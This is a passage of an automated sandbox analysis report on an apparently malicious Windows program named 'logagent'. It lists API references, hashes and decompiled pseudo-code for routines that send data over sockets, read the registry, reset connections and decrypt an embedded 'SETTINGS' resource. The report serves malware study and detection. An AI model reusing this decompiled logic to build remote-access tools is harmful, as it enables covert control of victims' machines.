                                  • CreateThread.KERNELBASE ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(000003C4,000000FF), ref: 00402389
                                  • FindCloseChangeNotification.KERNELBASE(000003C4), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6DF55DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@ChangeCloseD@1@@EventFindNotificationObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 4193475032-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402440 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: 60551aed7677e7da4961a2a4342efdfb0fbb19cd34e67c04f744ba626c38ac59
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: 60551aed7677e7da4961a2a4342efdfb0fbb19cd34e67c04f744ba626c38ac59
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D3C Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.1 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                  • Sleep.KERNELBASE(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.1 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.1 Pro$override$pth_unenc
                                  • API String ID: 3602623569-2954047980
                                  • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004129EB Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6DF55DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004027B1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 44%
                                  			E004027B1(void* __ecx) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				void* _v56;
				char* _t29;
				char* _t30;
				void* _t38;
				intOrPtr _t46;

				_t38 = __ecx;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
					L3:
					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
						_t46 =  *0x41bcac; // 0x0
						if(_t46 != 0) {
							GetLocalTime( &_v24);
							_t29 =  &_v5;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
							_t30 =  &_v40;
							L00414170();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
							_t21 = printf(_t30);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						E004020F4(_t21, _t38);
					}
					L7:
					 *((char*)(_t38 + 0x38)) = 0;
					 *((char*)(_t38 + 0x39)) = 0;
					return 0;
				}
				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
					Sleep(0x3e8); // executed
					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
					_t21 =  *(_t38 + 0x40);
					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
						continue;
					}
					goto L3;
				}
				goto L7;
			}











                                  0x004027b9
                                  0x004027c0
                                  0x004027c3
                                  0x004027e4
                                  0x004027e7
                                  0x004027e9
                                  0x004027ef
                                  0x004027f5
                                  0x00402812
                                  0x00402820
                                  0x00402827
                                  0x0040282b
                                  0x00402835
                                  0x0040283c
                                  0x00402848
                                  0x00402851
                                  0x00402851
                                  0x00402859
                                  0x00402859
                                  0x0040285e
                                  0x0040285e
                                  0x00402861
                                  0x00402869
                                  0x00402869
                                  0x004027c5
                                  0x004027d3
                                  0x004027d9
                                  0x004027dc
                                  0x004027e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004027e2
                                  0x00000000

                                  APIs
                                  • Sleep.KERNELBASE(000003E8), ref: 004027D3
                                  • GetLocalTime.KERNEL32(?), ref: 004027F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                  • printf.MSVCRT ref: 0040283C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                  Strings
                                  • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                  • Timeout expired, resetting connection., xrefs: 00402815
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                  • API String ID: 2756237499-4159561219
                                  • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                  • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413FA4 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 770 413fa4-414019 __set_app_type __p__fmode __p__commode call 404f3a 773 414027-41407e call 41411a _initterm __getmainargs _initterm 770->773 774 41401b-414026 __setusermatherr 770->774 777 414080-414088 773->777 778 4140ba-4140bd 773->778 774->773 779 41408a-41408c 777->779 780 41408e-414091 777->780 781 414097-41409b 778->781 782 4140bf-4140c3 778->782 779->777 779->780 780->781 783 414093-414094 780->783 784 4140a1-4140b2 GetStartupInfoA 781->784 785 41409d-41409f 781->785 782->778 783->781 786 4140c5-4140c7 784->786 787 4140b4-4140b8 784->787 785->783 785->784 788 4140c8-4140d3 GetModuleHandleA call 408c98 786->788 787->788 790 4140d8-4140f5 exit _XcptFilter 788->790
                                  C-Code - Quality: 79%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                  0x00413fa7
                                  0x00413fa9
                                  0x00413fae
                                  0x00413fb9
                                  0x00413fba
                                  0x00413fc7
                                  0x00413fcc
                                  0x00413fd1
                                  0x00413fd8
                                  0x00413fdf
                                  0x00413ff2
                                  0x00413ff4
                                  0x00413ffa
                                  0x00414000
                                  0x00414009
                                  0x0041400e
                                  0x00414013
                                  0x00414019
                                  0x00414020
                                  0x00414026
                                  0x00414026
                                  0x00414027
                                  0x0041402c
                                  0x00414031
                                  0x00414036
                                  0x00414040
                                  0x00414059
                                  0x0041405f
                                  0x00414064
                                  0x00414069
                                  0x00414076
                                  0x00414078
                                  0x0041407e
                                  0x004140ba
                                  0x004140ba
                                  0x004140bd
                                  0x00000000
                                  0x00000000
                                  0x004140bf
                                  0x004140c0
                                  0x004140c0
                                  0x00414080
                                  0x00414080
                                  0x00414080
                                  0x00414081
                                  0x00414084
                                  0x00414086
                                  0x00414091
                                  0x00414093
                                  0x00414093
                                  0x00414094
                                  0x00414094
                                  0x00414091
                                  0x00414097
                                  0x00414097
                                  0x0041409b
                                  0x00000000
                                  0x00000000
                                  0x004140a1
                                  0x004140a8
                                  0x004140ae
                                  0x004140b2
                                  0x004140c7
                                  0x004140b4
                                  0x004140b4
                                  0x004140b4
                                  0x004140d3
                                  0x004140d8
                                  0x004140dc
                                  0x004140e2
                                  0x004140e7
                                  0x004140e9
                                  0x004140ec
                                  0x004140ed
                                  0x004140ee
                                  0x004140f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409823 Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                  0x0040982c
                                  0x0040983c
                                  0x00409842
                                  0x00409846
                                  0x0040984c
                                  0x00409853
                                  0x00409855
                                  0x00409855
                                  0x0040985a
                                  0x0040985d
                                  0x00409860
                                  0x00409867
                                  0x00409872
                                  0x0040987e
                                  0x00409887
                                  0x00409892
                                  0x0040989e
                                  0x004098a0
                                  0x004098a4
                                  0x004098aa
                                  0x004098aa
                                  0x004098b1
                                  0x004098be
                                  0x004098c6
                                  0x004098db
                                  0x004098e3
                                  0x004098f1
                                  0x004098fa
                                  0x00409907

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
